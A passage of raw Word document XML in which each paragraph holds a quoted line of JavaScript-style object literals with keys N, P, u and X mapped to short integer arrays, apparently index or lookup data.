      </w:r>
    </w:p>
    <w:p w14:paraId="6B233050" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40015450" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0C6698" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC88D6B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E5FE31" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065559BF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1360B3DB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE08643" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 6, 159, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638BB0E6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010E4B70" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C70C009" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C83E387" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [16, 32, 35, 159, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABC713E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A514CC1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFA2F39" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F296DD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 6, 8, 35, 238]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3092918D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E68C0B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04972FDB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37139E55" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ADEF13" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B96C0A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3972A80E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA5F48D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [154, 263]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA3D2C3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD96154" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507788DD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CA6CB7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B96792" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C723A1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAEBE4A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C6FED0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342A5AEA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE8578" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74832ADA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670FDA5D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663914A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DA0F9A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669564FA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4FC974" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10, 19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF01991" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7511B2E1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43084E76" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B6CDEC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 21]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7006B464" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C43627A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [14, 1, 0, 15, 9, 6, 10, 7, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5025CFCA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A160AF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [172, 304]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B06ED6C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CF0587" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7813D5D8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFFBC73" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CED60B8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A43DA0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDCE13D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B9D141" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339D7A43" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B683967" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286EEED3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CCD64A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4745B338" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F9391E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F112292" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F67F962" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D6DCDF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E440A9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9171BB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C4E0B5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ED6E6C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B209F1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77341AD2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F5D3F1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D07C87" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A45EE75" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D9C6CF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ACD7E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E3978D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B39E5E0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67347A58" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [1, 347]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6346761B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212DD87B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D6A505" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2385B5D1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9CD649" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD593AD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8F0F90" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3154FE99" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B81404" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E4AE87" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1408390D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A81708E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C7C057" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742AB1C1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F22589" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7896CC50" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 4, 5, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C290735" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 6, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0656B1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5738A75B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33792CD8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABA2BB1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 5, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632AFB3E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F5607B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A82F1D4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C840CC3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [17]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EA6EE7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAD7A7F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [8, 1, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4641272A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C88459B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E332DD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0122FCD0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364977B4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B81FA73" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0471ECB7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2192E147" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5, 1, 6, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD92E7F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D97F7A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [131, 159, 176, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFC2DC8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67752FEA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BC1155" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF19DE0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52429CD3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60872DA2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEE77AB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6, 1, 0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2371B077" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8B9ACC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BE6E96" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A5283D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C058B64" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC1765D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 4]</w:t>
      </w:r>
    </w:p>
